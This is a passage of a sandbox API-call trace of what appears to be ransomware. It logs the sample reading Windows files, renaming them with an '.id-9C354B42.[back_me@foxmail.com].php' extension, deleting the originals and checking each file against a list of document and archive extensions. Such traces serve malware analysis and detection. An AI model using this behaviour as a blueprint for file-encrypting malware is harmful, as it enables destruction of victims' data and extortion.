dwMoveMethod=0x31afec8 | out: lpNewFilePointer=0x0) returned 1 [0241.612] SetEndOfFile (hFile=0x244) returned 1 [0241.613] CloseHandle (hObject=0x244) returned 1 [0241.613] SetFileAttributesW (lpFileName="C:\\bootsqm.dat.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x80) returned 1 [0241.613] DeleteFileW (lpFileName="C:\\bootsqm.dat" (normalized: "c:\\bootsqm.dat")) returned 1 [0241.613] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0241.613] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0241.613] lstrlenW (lpString=".doc") returned 4 [0241.613] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0241.613] lstrlenW (lpString=".docx") returned 5 [0241.613] lstrcmpiW (lpString1=".docx", lpString2="m.dat") returned -1 [0241.613] lstrlenW (lpString=".pdf") returned 4 [0241.613] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0241.613] lstrlenW (lpString=".xls") returned 4 [0241.614] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0241.614] lstrlenW (lpString=".xlsx") returned 5 [0241.614] lstrcmpiW (lpString1=".xlsx", lpString2="m.dat") returned -1 [0241.614] lstrlenW (lpString=".ppt") returned 4 [0241.614] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0241.614] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0241.614] lstrlenW (lpString=".zip") returned 4 [0241.614] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0241.614] lstrlenW (lpString=".rar") returned 4 [0241.614] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0241.614] lstrlenW (lpString=".bz2") returned 4 [0241.614] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0241.614] lstrlenW (lpString=".7z") returned 3 [0241.614] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0241.614] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0241.614] lstrlenW (lpString=".dbf") returned 4 [0241.614] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0241.614] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0241.614] lstrlenW (lpString=".1cd") returned 4 [0241.614] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0241.614] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0241.614] lstrlenW (lpString=".jpg") returned 4 [0241.614] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0241.614] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0241.614] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0241.614] lstrlenW (lpString=".doc") returned 4 [0241.614] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0241.615] lstrlenW (lpString=".docx") returned 5 [0241.615] lstrcmpiW (lpString1=".docx", lpString2="m.dat") returned -1 [0241.615] lstrlenW (lpString=".pdf") returned 4 [0241.615] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0241.615] lstrlenW (lpString=".xls") returned 4 [0241.615] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0241.615] lstrlenW (lpString=".xlsx") returned 5 [0241.615] lstrcmpiW (lpString1=".xlsx", lpString2="m.dat") returned -1 [0241.615] lstrlenW (lpString=".ppt") returned 4 [0241.615] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0241.615] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0241.615] lstrlenW (lpString=".zip") returned 4 [0241.615] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0241.615] lstrlenW (lpString=".rar") returned 4 [0241.615] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0241.615] lstrlenW (lpString=".bz2") returned 4 [0241.615] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0241.615] lstrlenW (lpString=".7z") returned 3 [0241.615] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0241.615] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0241.615] lstrlenW (lpString=".dbf") returned 4 [0241.615] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0241.615] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0241.615] lstrlenW (lpString=".1cd") returned 4 [0241.615] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0241.615] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0241.615] lstrlenW (lpString=".jpg") returned 4 [0241.615] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0241.616] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0241.616] lstrlenW (lpString="Alphabet.xml") returned 12 [0241.616] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0241.745] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x31aff1c | out: lpFileSize=0x31aff1c*=791686) returned 1 [0241.745] CloseHandle (hObject=0x2b8) returned 1 [0241.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml")) returned 0x20 [0241.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.745] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.745] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0241.745] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0241.745] lstrlenW (lpString=".doc") returned 4 [0241.745] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0241.745] lstrlenW (lpString=".docx") returned 5 [0241.745] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0241.745] lstrlenW (lpString=".pdf") returned 4 [0241.745] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0241.745] lstrlenW (lpString=".xls") returned 4 [0241.746] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0241.746] lstrlenW (lpString=".xlsx") returned 5 [0241.746] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0241.746] lstrlenW (lpString=".ppt") returned 4 [0241.746] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0241.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0241.746] lstrlenW (lpString=".zip") returned 4 [0241.746] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0241.746] lstrlenW (lpString=".rar") returned 4 [0241.746] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0241.746] lstrlenW (lpString=".bz2") returned 4 [0241.746] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0241.746] lstrlenW (lpString=".7z") returned 3 [0241.746] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0241.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0241.746] lstrlenW (lpString=".dbf") returned 4 [0241.746] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0241.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0241.746] lstrlenW (lpString=".1cd") returned 4 [0241.746] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0241.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0241.746] lstrlenW (lpString=".jpg") returned 4 [0241.746] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0241.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0241.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0241.746] lstrlenW (lpString=".doc") returned 4 [0241.746] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0241.746] lstrlenW (lpString=".docx") returned 5 [0241.746] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0241.747] lstrlenW (lpString=".pdf") returned 4 [0241.747] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0241.747] lstrlenW (lpString=".xls") returned 4 [0241.747] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0241.747] lstrlenW (lpString=".xlsx") returned 5 [0241.747] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0241.747] lstrlenW (lpString=".ppt") returned 4 [0241.747] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0241.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0241.747] lstrlenW (lpString=".zip") returned 4 [0241.747] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0241.747] lstrlenW (lpString=".rar") returned 4 [0241.747] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0241.747] lstrlenW (lpString=".bz2") returned 4 [0241.747] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0241.747] lstrlenW (lpString=".7z") returned 3 [0241.747] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0241.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0241.747] lstrlenW (lpString=".dbf") returned 4 [0241.747] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0241.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0241.747] lstrlenW (lpString=".1cd") returned 4 [0241.747] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0241.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0241.747] lstrlenW (lpString=".jpg") returned 4 [0241.747] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0241.747] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0241.748] lstrlenW (lpString="Content.xml") returned 11 [0241.748] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0241.748] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x31aff1c | out: lpFileSize=0x31aff1c*=27045) returned 1 [0241.748] CloseHandle (hObject=0x2b8) returned 1 [0241.748] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0x20 [0241.748] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.748] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.748] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0241.748] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0241.748] lstrlenW (lpString=".doc") returned 4 [0241.748] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0241.748] lstrlenW (lpString=".docx") returned 5 [0241.748] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0241.748] lstrlenW (lpString=".pdf") returned 4 [0241.748] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0241.748] lstrlenW (lpString=".xls") returned 4 [0241.748] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0241.748] lstrlenW (lpString=".xlsx") returned 5 [0241.748] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0241.748] lstrlenW (lpString=".ppt") returned 4 [0241.748] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0241.748] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0241.748] lstrlenW (lpString=".zip") returned 4 [0241.748] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0241.748] lstrlenW (lpString=".rar") returned 4 [0241.749] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0241.749] lstrlenW (lpString=".bz2") returned 4 [0241.749] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0241.749] lstrlenW (lpString=".7z") returned 3 [0241.749] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0241.749] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0241.749] lstrlenW (lpString=".dbf") returned 4 [0241.749] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0241.749] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0241.749] lstrlenW (lpString=".1cd") returned 4 [0241.749] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0241.749] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0241.749] lstrlenW (lpString=".jpg") returned 4 [0241.749] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0241.749] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0241.749] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0241.749] lstrlenW (lpString=".doc") returned 4 [0241.749] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0241.749] lstrlenW (lpString=".docx") returned 5 [0241.749] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0241.749] lstrlenW (lpString=".pdf") returned 4 [0241.749] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0241.749] lstrlenW (lpString=".xls") returned 4 [0241.749] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0241.749] lstrlenW (lpString=".xlsx") returned 5 [0241.749] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0241.749] lstrlenW (lpString=".ppt") returned 4 [0241.749] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0241.749] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0241.749] lstrlenW (lpString=".zip") returned 4 [0241.750] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0241.750] lstrlenW (lpString=".rar") returned 4 [0241.750] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0241.750] lstrlenW (lpString=".bz2") returned 4 [0241.750] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0241.750] lstrlenW (lpString=".7z") returned 3 [0241.750] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0241.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0241.750] lstrlenW (lpString=".dbf") returned 4 [0241.750] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0241.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0241.750] lstrlenW (lpString=".1cd") returned 4 [0241.750] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0241.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 62 [0241.750] lstrlenW (lpString=".jpg") returned 4 [0241.750] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0241.750] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0241.750] lstrlenW (lpString="boxed-correct.avi") returned 17 [0241.750] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0241.750] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x31aff1c | out: lpFileSize=0x31aff1c*=89600) returned 1 [0241.750] CloseHandle (hObject=0x2b8) returned 1 [0241.750] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi")) returned 0x20 [0241.750] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.751] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0241.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0241.751] lstrlenW (lpString=".doc") returned 4 [0241.751] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0241.751] lstrlenW (lpString=".docx") returned 5 [0241.751] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0241.751] lstrlenW (lpString=".pdf") returned 4 [0241.751] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0241.751] lstrlenW (lpString=".xls") returned 4 [0241.751] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0241.751] lstrlenW (lpString=".xlsx") returned 5 [0241.751] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0241.751] lstrlenW (lpString=".ppt") returned 4 [0241.751] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0241.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0241.751] lstrlenW (lpString=".zip") returned 4 [0241.751] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0241.751] lstrlenW (lpString=".rar") returned 4 [0241.751] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0241.751] lstrlenW (lpString=".bz2") returned 4 [0241.751] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0241.751] lstrlenW (lpString=".7z") returned 3 [0241.751] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0241.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0241.751] lstrlenW (lpString=".dbf") returned 4 [0241.751] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0241.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0241.751] lstrlenW (lpString=".1cd") returned 4 [0241.751] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0241.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0241.752] lstrlenW (lpString=".jpg") returned 4 [0241.752] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0241.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0241.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0241.752] lstrlenW (lpString=".doc") returned 4 [0241.752] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0241.752] lstrlenW (lpString=".docx") returned 5 [0241.752] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0241.752] lstrlenW (lpString=".pdf") returned 4 [0241.752] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0241.752] lstrlenW (lpString=".xls") returned 4 [0241.752] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0241.752] lstrlenW (lpString=".xlsx") returned 5 [0241.752] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0241.752] lstrlenW (lpString=".ppt") returned 4 [0241.752] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0241.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0241.752] lstrlenW (lpString=".zip") returned 4 [0241.752] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0241.752] lstrlenW (lpString=".rar") returned 4 [0241.752] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0241.752] lstrlenW (lpString=".bz2") returned 4 [0241.752] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0241.752] lstrlenW (lpString=".7z") returned 3 [0241.752] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0241.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0241.752] lstrlenW (lpString=".dbf") returned 4 [0241.752] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0241.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0241.752] lstrlenW (lpString=".1cd") returned 4 [0241.752] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0241.753] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0241.753] lstrlenW (lpString=".jpg") returned 4 [0241.753] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0241.753] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0241.753] lstrlenW (lpString="boxed-delete.avi") returned 16 [0241.753] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0242.015] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x31aff1c | out: lpFileSize=0x31aff1c*=31744) returned 1 [0242.015] CloseHandle (hObject=0x30c) returned 1 [0242.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0x20 [0242.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0242.015] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0242.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0242.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0242.015] lstrlenW (lpString=".doc") returned 4 [0242.015] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0242.015] lstrlenW (lpString=".docx") returned 5 [0242.015] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0242.015] lstrlenW (lpString=".pdf") returned 4 [0242.015] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0242.015] lstrlenW (lpString=".xls") returned 4 [0242.015] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0242.015] lstrlenW (lpString=".xlsx") returned 5 [0242.015] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0242.015] lstrlenW (lpString=".ppt") returned 4 [0242.015] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0242.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0242.015] lstrlenW (lpString=".zip") returned 4 [0242.015] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0242.016] lstrlenW (lpString=".rar") returned 4 [0242.016] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0242.016] lstrlenW (lpString=".bz2") returned 4 [0242.016] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0242.016] lstrlenW (lpString=".7z") returned 3 [0242.016] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0242.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0242.016] lstrlenW (lpString=".dbf") returned 4 [0242.016] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0242.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0242.016] lstrlenW (lpString=".1cd") returned 4 [0242.016] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0242.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0242.016] lstrlenW (lpString=".jpg") returned 4 [0242.016] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0242.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0242.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0242.016] lstrlenW (lpString=".doc") returned 4 [0242.016] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0242.016] lstrlenW (lpString=".docx") returned 5 [0242.016] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0242.016] lstrlenW (lpString=".pdf") returned 4 [0242.016] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0242.016] lstrlenW (lpString=".xls") returned 4 [0242.016] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0242.016] lstrlenW (lpString=".xlsx") returned 5 [0242.016] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0242.016] lstrlenW (lpString=".ppt") returned 4 [0242.016] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0242.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0242.017] lstrlenW (lpString=".zip") returned 4 [0242.017] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0242.017] lstrlenW (lpString=".rar") returned 4 [0242.017] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0242.017] lstrlenW (lpString=".bz2") returned 4 [0242.017] lstrcmpiW 